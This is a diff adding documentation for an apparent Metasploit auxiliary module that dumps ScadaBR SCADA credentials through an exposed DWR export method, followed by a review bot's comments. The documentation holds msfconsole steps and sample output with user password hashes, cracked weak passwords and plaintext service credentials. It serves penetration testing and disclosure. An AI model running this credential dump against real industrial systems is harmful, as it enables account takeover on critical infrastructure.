|
| 1 | +## Description |
| 2 | + |
| 3 | + This module retrieves credentials from ScadaBR, including service credentials and unsalted SHA1 password hashes for all users, by invoking the `EmportDwr.createExportData` DWR method of Mango M2M which is exposed to all authenticated users regardless of privilege level. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model. |
| 9 | + |
| 10 | + This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems. |
| 11 | + |
| 12 | + Installers: |
| 13 | + |
| 14 | + * [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/) |
| 15 | + * [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/) |
| 16 | + * [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/) |
| 17 | + |
| 18 | + |
| 19 | +## Verification Steps |
| 20 | + |
| 21 | + 1. Start `msfconsole` |
| 22 | + 2. Do: `use auxiliary/admin/http/scadabr_credential_dump` |
| 23 | + 3. Do: `set rhost [IP]` |
| 24 | + 4. Do: `set username [USERNAME]` |
| 25 | + 5. Do: `set password [PASSWORD]` |
| 26 | + 6. Do: `run` |
| 27 | + 7. You should get credentials |
| 28 | + |
| 29 | + |
| 30 | +## Sample Output |
| 31 | + |
| 32 | + ``` |
| 33 | + [+] 172.16.191.166:8080 Authenticated successfully as 'admin' |
| 34 | + [+] 172.16.191.166:8080 Export successful (4436 bytes) |
| 35 | + [+] Found 5 users |
| 36 | + [*] Found weak credentials (admin:admin) |
| 37 | + [*] Found weak credentials (user:password) |
| 38 | + [*] Found weak credentials (zxcv:zxcv) |
| 39 | +
|
| 40 | + ScadaBR User Credentials |
| 41 | + ======================== |
| 42 | +
|
| 43 | + Username Password Hash (SHA1) Admin E-mail |
| 44 | + -------- -------- ----------- ----- ------ |
| 45 | + admin admin d033e22ae348aeb5660fc2140aec35850c4da997 true [email protected] |
| 46 | + operator ef0cade28a5696433326749bb57c39104ca33550 false operator@localhost |
| 47 | + test 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 false test@localhost |
| 48 | + user password 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 true user@localhost |
| 49 | + zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 false zxcv@localhost |
| 50 | +
|
| 51 | +
|
| 52 | + ScadaBR Service Credentials |
| 53 | + =========================== |
| 54 | +
|
| 55 | + Service Host Port Username Password |
| 56 | + ------- ---- ---- -------- -------- |
| 57 | + HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass |
| 58 | + SMTP 127.0.0.1 25 smtptestuser smtptestpass |
| 59 | +
|
| 60 | + [+] Config saved in: /root/.msf4/loot/20170527210941_default_172.16.191.166_scadabr.config_861842.txt |
| 61 | + [*] Auxiliary module execution completed |
| 62 | + ``` |
| 63 | + |
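Review bot: The Sample Output (doc lines 33-34) shows the run authenticating as 'admin', so it does not demonstrate the Description's claim that `EmportDwr.createExportData` is exposed to all authenticated users regardless of privilege level. A run as a non-admin account such as `operator` (Admin `false` in the user table) would back that claim up. The Verification Steps set only `rhost`, `username` and `password`, yet the output targets port 8080, so either state that this is the module's default port or add a step for it. The doc also never says how the Password column gets filled in: the "Found weak credentials" lines appear without any explanation of what is tested against the unsalted SHA1 hashes, and a short Options or Notes section covering that would make the output easier to interpret.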